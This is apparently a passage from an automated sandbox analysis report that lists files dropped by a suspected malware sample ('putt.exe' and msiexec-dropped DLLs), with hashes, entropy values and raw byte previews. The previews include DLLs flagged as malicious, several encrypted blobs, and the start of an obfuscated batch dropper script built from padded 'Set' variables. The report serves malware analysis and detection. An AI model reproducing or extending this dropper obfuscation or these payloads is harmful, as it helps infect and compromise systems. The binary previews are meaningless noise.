SHA-512:	95813E8128D7E1E3FF1B7CD4E68DBB4217CFE615ED77ADB71B7C4A975B926E2BC1717B8CADC1F0264F76A6C532395CAD25DF1E626396D8490FD31F99D9E5492C
Malicious:	false
Preview:	e./.(....YI.....5.V.l.......T.tG..~...v.v.......E.....-d.<.IV...6..q....G.....]....b..\|[.b...`.pP!..+.OJ.\KK."c..7.....j...........(.>x.......7q..K..>xH....(Y.D....:.qhykQmw...KC.m....[.6wx.V.]n..D....p../.4.%fQ3@...Jl...X.l...<...N........x[...{.o....E...s.;.X.Q.H.O..[...^ts.=..p.......h....[\|.............t.....pc.d.....L.Dq..U...j}E..Q....n.....\|..,.c..1.3.Js....@D\|..p........3.W...F.......,.r~....X..Si[,....+..a..lx.s...u.&IY3.u@...@4.R..'e.+u.A.....uS8.xR<./L...+..C5rK..U.$.C[.]....v.;......]V....H.R.(.%....x..PE{....6.sq.Km......Zx.HD.x.f=@.O..d.:d.....x..</%............n...M.#...yi.........>+.F...k...,/#..]P.CL..;M.lC...........b.x.!..!..).(J........b.?,...r....g....^B\o$N..Z.......q....;..."`.....\.^..'~#.2.70.<-......+...+..#....t.4..69.4....:(..n(=.CfH.m..E..k.=...+........\.Q.Q...SP.{...-.Ga.)..c.6........3...`>.}....dp....g..km............1&..D.&.E0....8.b=n..4 -.Q..'_....:./.H......K....O..s.~.(-2.._...`\..v..NM........l.W....p.Z

C:\Users\user\AppData\Local\Temp\Levels

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.434292254751019
Encrypted:	false
SSDEEP:	3072:dZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjC:dK5vPeDkjGgQaE/loUDtf0aC
MD5:	AB9F8FF7A947DF4AF1D207F3AF0616C3
SHA1:	BFD6C7A7F1FB693A7481AA2EC0482CDEC7BD65AF
SHA-256:	09939454FC8573384E502F2E75162A3D74FD99B19BBCE41ED49C6D70EC28E97F
SHA-512:	4882AB13631F354B72B2D944A7BE183DE909DF731CC9AEA901CD046B0A7722B9F98215EBB258A79BB5945E9051799946E14C1C649F25CC08E5885FABDBB67631
Malicious:	false
Preview:	[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$.......

C:\Users\user\AppData\Local\Temp\MSIFDC5.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIFE52.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIFEB1.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIFEE1.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIFF11.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIFFBE.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIFFEE.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1025128
Entropy (8bit):	6.5991528155295684
Encrypted:	false
SSDEEP:	24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
MD5:	DE574F7F5256F98F356A2D620C4A2288
SHA1:	1D57D182BB748170F5CEFB7ECF594B4998E113B8
SHA-256:	E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
SHA-512:	431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Manually

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	1689
Entropy (8bit):	4.719623873656082
Encrypted:	false
SSDEEP:	24:858yGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+H:e9n9mTsCNvEQH5O5U1nPKrhBV
MD5:	6071B27763D5259C22095E7AFEDCE652
SHA1:	A8375E869AE0348F5B191EAC5318FA7B7A1D333E
SHA-256:	81F217A566284A757825BAA507D4F234D1607D642FF06ED552BB8AF183732CD8
SHA-512:	95AE9789CF136F44412E8FDE79BE03F519090BEC58CF91E3194FB32611BA70964B170511DD9064DFB0A8045C0D224B24B12B9657BF77A1F54E95C9AC9291BF54
Malicious:	false
Preview:	applied........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Perfectly

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.998012724205869
Encrypted:	true
SSDEEP:	1536:oFK2h6OFezqH8nNSGbeTb2wdAMFiq9mQcHPqJ30jTF/Ykp3dgyUoAt3:o/6jzqHISweTb2s9mQciJ3iF/lp3inou
MD5:	AF7F5F456496DAC800C2783FC2556A83
SHA1:	A18A4FD55C28298CE16114568A5FD262243569A4
SHA-256:	CD7FD761B5C0CB65F8C49C5D855D62AC437A3AFA82D0ADC73CFA325431B46CB9
SHA-512:	7ABA8BB4BD7604FE02D37FC5CE2D93FD61593523703126EAC21A387BFC671377A31690DA060033AA5CB9CD0FA5F5C9170149D64087E142E9D25B666881BC786F
Malicious:	false
Preview:	%....#..t..z3)..W...T=.k..trY.e=....5... x....6.r....I:..p...\..@l...t...K...`..h..XJM<...\|'._.8;...&{......z..Q].B=..1.....A...[..p...f.~..b.........?..w+.."2u......8.G..z....[..B.6 ..-..+'....^T..%.....>\.....mx.)...6........+.WU..XJ..^T.".{.J..ba......jE....k........,...}t....w....^..UpH.I..s..i...(FJ,.....j.D..c!u........F..X.f...y.....A.......&.pvy`....w.....(e#...[.I\|............oIs..%.x..u..q~..N..mo.y4{F.2...N...[b.3...gK..[.l...D....[..u.On.a..O.E..b..hc....k..........V...........,....U.~~......(\m.5M...A...a...]..n....k.M'.i..>1..!G.K.d<.y@.Z(.ZmO .U'.qK"..o#..x..L........L............v..x~c..vO..~.\|.-a.y.0k..u..IC.?&..9.n..qg.....l..+.<1.v....F..t..%..1E...{.#..df.9...S...f....Y..>..s.e...l.}.r.:B...{....Tt>....3y...Ky.8.Ur...3......z... ....5..;..m??.itI...m.h.l.........7#...B;.B.o..c.......G/B...G...^g..2.H...].Xk.-.l.\....6Tro)a........vPs.?#b...[..J.^F..q{4n...tb.h..~b....9..m*.".."-.T.t.PC(j..F....._.z.t.

C:\Users\user\AppData\Local\Temp\Pizza

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	tar archive (V7), type ' ' _\332j\3322, uid \020\02, gid \020\02, size \020\020\020, seconds , linkname
Category:	dropped
Size (bytes):	113094
Entropy (8bit):	6.066456019294958
Encrypted:	false
SSDEEP:	1536:A5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:A5elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	6E3A742D201F9A8D61FE1448427B31F3
SHA1:	38C78737B789EB5A28AF0E4BBE65B5155977291D
SHA-256:	E3974BC39F099657327F5A518E4F66E666E800B1E8C69704F6ACF63E40E7D1AE
SHA-512:	FEF4161113B9442AFD34736ED49F77FA3599D3F98FD5A1497D356A0441D4DBCF0C251AE1F0B74B6E4E56C24C9FB2B7F0B6ED956E669C54E78DFD44E5311A435E
Malicious:	false
Preview:	_.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ............................................................................................................................................................................................................................................................... ......................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ......................................

C:\Users\user\AppData\Local\Temp\Rating

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	modified
Size (bytes):	131072
Entropy (8bit):	5.966887409238837
Encrypted:	false
SSDEEP:	3072:H640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPK:a4V14ZgP0JaAOz04phdyC
MD5:	10F104AB803F4F1D4347D2B338CB2715
SHA1:	DA59AEC00DDFC5D78292CA69AAF38AAC278E1DE2
SHA-256:	172F04E6F1B52AF90ACAF598B12722D6722AE704997D8373ED085DF4C2769C4B
SHA-512:	DCA227B8FB0091F7267E75222E87699AB81C3683FD9FA3BF91B220263463EAE93CD5A4D08CD79FBF1E4C52648698957E34C8F837C357E0D20AFF7AE1094CFB9E
Malicious:	false
Preview:	@H.E..t.j.......<t.Pj.j.....I..5 .I.PS.E....u.E.S....I..u..E.S..E.}.E.......E.j.j..E.P..... .I.j.j..u..u..u..u.S....I..}.j..7..\.I..............#.. .......u.;.u.....u.j.Y.....t..........u.....u.j.j.j..7..H.I.3.j.Z.x............Q.....YWP.E.E..0..t.I..}..t&.u.}.j.j..E.P..... .I..E.PS..$.I..u..}..t.j.....I.PS..,.I.V.u.E.Pj.VS..(.I.V....= .I.Y.u.S...u..5..I....u.S...u....u.S..,.I..u.S....I._3.^@[....U..].....U....VW.}..E.PW....I..u..E.+E.+u....)M.;E.\|>;E..9..)M.;E.\|/;E..;5.)M.."W..P.I...t.W....I...t..=\|)M..5.)M.3._@^....U... SVW.E....P.E...u...@)M.......0....I..D)M.3..E..........@)M.......U.........j.^95d)M........T)M........ts.A.;B.uk...... ub......<.t....;.....uM.E.P.1....I..u..E..u.P..8.I...t.M.99t...T)M.............u:.}...U.}..u....U.F;5d)M...r...G;}...D....u..x...x..E.....99t.......j.....I...._^[....U..S.].W.u..3......E.YY..t...+;.....3.....Y.........*V.u.W.3V.CT.....3.f..~^9E.t.G..?....t.....2._[]...VW..4.I.....p.I.....tgV..(M..A......tW..@)M.W....0.........t

C:\Users\user\AppData\Local\Temp\Robertson

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.997377329731832
Encrypted:	true
SSDEEP:	1536:w8PZhyOyi5mHovmlml9TlJu9oA5/oATbontNxOXV7xi:w8PZhsmr/M5wATQFEVI
MD5:	F74B04821F14C015E2F831CD7CF4D183
SHA1:	E476864500CE75184B00DD96D92C19F6B182C06B
SHA-256:	28B3F3C8E17079038709ECA61EB4FD0C513F3121E772463EE31C8F95CCCCD6D9
SHA-512:	345A9ABD6A0B6A808D56E5818BCC1C60327861B3FE82726190590915A66DF93C4F77323BC8E83657BDBBBDC51449E7C352797AE0B145493A5943406A410D4B23
Malicious:	false
Preview:	.]y.=b..l.\1.H.......]/.s.b.bB...^..... ..3..(WK.^/p.U.C.....@.+.j.L..7k..%.._ ..;.X.1Y."...-......W...K..A..0.i.-.Faq.wc....}.w..e-.J..S.Jio"...P.i`..(...gp......,....6n..g.......[......MZ....I....@$&......b..w[^_.J..1.~.-+x..M.Ph+..R..O..MK>...a%.._$-....D.\9.0....}F0?I.)...K....G..&.Pr...9x1......{.'.._A.}...xB%$;.}....u.a.G.,..t{J.I.'.^..........A..}x..p.....L.X..d.i...~.(1.NE./W...$0..6{.9....v}...V..s..}.].e..e#J=..?..8...Cr..LI....S.A...h?q..oVS[..CU.'.6.v..6....g. G(M5p....nh..J...NK..[W.I..\|..V..q..}x.A..)p.....M...'.&uN....K...{...-;K\r.....w.U\MnE0..2%.......g...i.%5;R..`5.....!..F.....S....0...!Q.y..w.#.1..^...Ue..c-N$#v.....8..sz....r..P..aw+..f.9...B..u.....aF...dA.....F..s'I...b4.2.....H{L].....sN..x.(.$kR9.~...Y....`p`.*..%.e.?....\|.6....{.kE...g".b..J..i4%f2v`A).....&p......./M.H.d`u.S....~7.........o\4o.u#..[jz...R.ve.X.g.B..z.?.5.g.5.t.B..ow).....oc.....0<.J.j\|..Tg,.....y..c+..>1...i...<...f.S.BG .U.w.......TL..75...

C:\Users\user\AppData\Local\Temp\Saddam

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.998241155825975
Encrypted:	true
SSDEEP:	1536:vAT5m+pNiZWn3HCUJsRhcSkwZrEouRLYngwtR2i7UIZjnfZzZIAe6H5f1+oa:vAdXpIZW3HARhcSrELYXtR2i7RVBSX+a
MD5:	6E2264444F4EBFF4D68A451391683F27
SHA1:	FE994645CBBEB2B626FA869A1BB81736C0873AE9
SHA-256:	143AB2329CFA5252F0849F2C88380B2214E7C719D7901A3702F41C257A66583E
SHA-512:	23DA9B93A5FD4BD2BB4C73D748D99F3D07ED76D735FD7EBF7736347EA048F1204C36A540E646C6D8A756DF656BC2F1985D5DBD42A9437E66478BBD0098870673
Malicious:	false
Preview:	.H.....m4...=.../.;.1..!..p[..E.!..2.[.V...ma.VF;:.d..7.7.rZ.y.{....m.7..G. .E4>.......`O.'..m..o.aT...0S....z4/..!..1..'.y.o......QU...3.J .2...t.U..0..GI..o.k..WY..5~.`_F.2X..."mC...S..NPaD..j.rB....}.....Xa.....F.P......HX..[H=i..:......a..j.,B.(,.{.zix..l.$yg1....."....W../..Ai.......7....P. z1.M..d... ~.=.g8.}....'c..".@........[2@..4X..s.QR.W..&/.5.!.....3^D&...U....-M...5A......%...P.TS..j+......4$.....d^...Fx~}..6.].....\|O.Ae....<z.k.6....;k.X...n.Hjy....v.G...I..\.&.?...A...dm........'.$....@!.).....P.....:...6U.......D.e.....w..C.q.._.d........_..daY4i.g..yb.[...!7.o.!......7..a..C..L....TI.o..h..'.E.@...p...J...m.U.}k...O.....H...V.\|.%.5..<...fS.B.'sr....<Z...j.YXpF...P.A.,.:qFo...*.?.....C..D..~:...t!Od.iI.....=....0.bTl.>O...@..sf3...rP$[b...j....D-O.u....N........S......\?}.s...9..L.]P....Y...x.).&\bX....E...._%..................}....:..........3.?..-?...%3)..-iM...O..Q1_.. ......=..H.0..kk../TU...n.5.o.......c@...hU......

C:\Users\user\AppData\Local\Temp\Verzeichnis

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	ASCII text, with very long lines (1400), with CRLF line terminators
Category:	dropped
Size (bytes):	30197
Entropy (8bit):	5.098081137116911
Encrypted:	false
SSDEEP:	768:iWOkz6QQTyu8MCySaOcS6Y0tdbKiOiQwuIaSN9vH3:iK2jyu5N7Oco0tdbKiOiQwuIaSvv3
MD5:	375387BEBE09983016B9851446A4AE0C
SHA1:	B7D4CEBB37D8E2C572AB09FCC90EC3B9612CD51C
SHA-256:	F8F952D3BFA71EE9259E5EEAC96B7EF6993B99160BAE31174A3048AFEF58372A
SHA-512:	89A7095DC8F2C24F00D7DDF25AD280B281EDC21A5D8A9CBC2EDD93DF3551FFD9BF4EAF1A53607B3E2D2DB9DE4197C00220BFE576848BBB5F559FD1CB55907127
Malicious:	false
Preview:	Set Suck=Z..BabwReturning-Frames-Urls-Paradise-Councils-..ClAbandoned-Uploaded-Bibliographic-Checking-Expressed-..vtRegardless-Producer-Abandoned-Navigation-..ucogMention-Spas-Kw-Pix-Format-Timer-..YPVs-To-..NaDStuck-Incomplete-Avg-Hoped-Grants-..WKsCleaning-Pissing-Slovakia-Cycling-Announced-..Set Ted=D..ZLZUltimately-Worthy-Southeast-..zPpMade-Confident-Credit-Repository-Stockholm-Thy-Minolta-Lifetime-Achieving-..muValentine-Ash-Survivors-..vKSanta-Holy-Announcements-Seminars-Severe-Contain-Brought-Clicks-News-..kMEncoding-Unauthorized-Accommodations-Packaging-Highlighted-..KDLegs-Silence-Dell-Tagged-Bank-Working-Um-..Set Email=h..fZyOSymphony-Detailed-Origins-..HebWallpapers-Tel-Ceo-..LUCrossing-Harold-Jobs-Chart-Sudden-Jenny-..vzHFFreebsd-Nike-Erik-Particles-Fbi-Liz-Nickname-Royal-..BaWinston-Solved-Var-Expired-..HJcSunday-Rentals-Tex-Latex-Volkswagen-Traveler-Sorts-Acrylic-Simpson-..PeBasename-Queens-..jQHCampaign-Homepage-..Set Recommendation=H..oTxMetals-Boy-Mortgages-Forbidden-

C:\Users\user\AppData\Local\Temp\Verzeichnis.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1400), with CRLF line terminators
Category:	dropped
Size (bytes):	30197
Entropy (8bit):	5.098081137116911
Encrypted:	false
SSDEEP:	768:iWOkz6QQTyu8MCySaOcS6Y0tdbKiOiQwuIaSN9vH3:iK2jyu5N7Oco0tdbKiOiQwuIaSvv3
MD5:	375387BEBE09983016B9851446A4AE0C
SHA1:	B7D4CEBB37D8E2C572AB09FCC90EC3B9612CD51C
SHA-256:	F8F952D3BFA71EE9259E5EEAC96B7EF6993B99160BAE31174A3048AFEF58372A
SHA-512:	89A7095DC8F2C24F00D7DDF25AD280B281EDC21A5D8A9CBC2EDD93DF3551FFD9BF4EAF1A53607B3E2D2DB9DE4197C00220BFE576848BBB5F559FD1CB55907127
Malicious:	false
Preview:	Set Suck=Z..BabwReturning-Frames-Urls-Paradise-Councils-..ClAbandoned-Uploaded-Bibliographic-Checking-Expressed-..vtRegardless-Producer-Abandoned-Navigation-..ucogMention-Spas-Kw-Pix-Format-Timer-..YPVs-To-..NaDStuck-Incomplete-Avg-Hoped-Grants-..WKsCleaning-Pissing-Slovakia-Cycling-Announced-..Set Ted=D..ZLZUltimately-Worthy-Southeast-..zPpMade-Confident-Credit-Repository-Stockholm-Thy-Minolta-Lifetime-Achieving-..muValentine-Ash-Survivors-..vKSanta-Holy-Announcements-Seminars-Severe-Contain-Brought-Clicks-News-..kMEncoding-Unauthorized-Accommodations-Packaging-Highlighted-..KDLegs-Silence-Dell-Tagged-Bank-Working-Um-..Set Email=h..fZyOSymphony-Detailed-Origins-..HebWallpapers-Tel-Ceo-..LUCrossing-Harold-Jobs-Chart-Sudden-Jenny-..vzHFFreebsd-Nike-Erik-Particles-Fbi-Liz-Nickname-Royal-..BaWinston-Solved-Var-Expired-..HJcSunday-Rentals-Tex-Latex-Volkswagen-Traveler-Sorts-Acrylic-Simpson-..PeBasename-Queens-..jQHCampaign-Homepage-..Set Recommendation=H..oTxMetals-Boy-Mortgages-Forbidden-

C:\Users\user\AppData\Local\Temp\Warm

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	54352
Entropy (8bit):	7.9971503948340485
Encrypted:	true
SSDEEP:	768:MLQOmJAKbDl5ByxLyIh7tQ65pMPE1VOldVX4qZmgVh8NHaDtdK/ePyhiq467oN:+mVl54hR5Wc1VOlzX4ngDlnqxhS678
MD5:	AC33880D844C5B1A1F52861EF2C6C559
SHA1:	3FC04278639E1EA4D92B3610101116A3B989D023
SHA-256:	18A39265B0DBC8C7A21EAE19C2013AC23E09ED9B7D2DF966FE260BFB0B909C20
SHA-512:	B1223AFB6270DA049DE253561B6F93B1DA60BF9F961ED6AE8EC3775B2C4FA732F603A817855E240013C088C129EE5CC03A8271C5963DC8E79FB804254F7D7124
Malicious:	false
Preview:	}U]3F^$E...Ja9..(...dj...........R.J7.(i.d.....-......q.QMS.H..a.f.wI.\|op0...O.......$y.@:.O.i6.pb.P..cG.r7!.76!..4u+m....m...z..5P..k%...N.$s.ER.."...SKJ....%......H......a......<G......5....z....7J.....A6V].......9..r.......zqyK......`....y(..W....`\....6.G...T.3.\|."/.\.2..naBK.PLw...g..Q.FY{7..s.2.yP'JGH....p.~..'mA....\|..f.y....-.}$z..B..].'...x........,.i.FZD......1.&>.L..CC~_..#.M...-...S.J..$v.6..F.X.6..Y].n.~.5........."N.V.0......2.YD.~......ts..K..$..,._..x.d.p..x..U..r+.w."..s.[_&.3t}..7....e@.J.'a8...O..hB.E....9Sx...w.........X.........1%(7.L.......>?j..F....jB/...M.#G(.....R......e.T(..A..w....lg..W.d.a^.?.........y8.!{d._..p.;...Qv..)..H.........k)...H.T.6.T.....&(...t...b~5....E..TvW......g.[...4.t.l.X.h..Pe....6@....Q...@.:vp..C......h!..j..KwUtQ).......T......{&e(r...s...JB....#}d.....SB..........l..S.n...n{..V4.{..V.p......g....(....Z.A_7 e.....\..v;^....X>.!4b0rO.+5...B...._.3.[.)...L..._.<...q...K.p.7..J.[u..w..&..

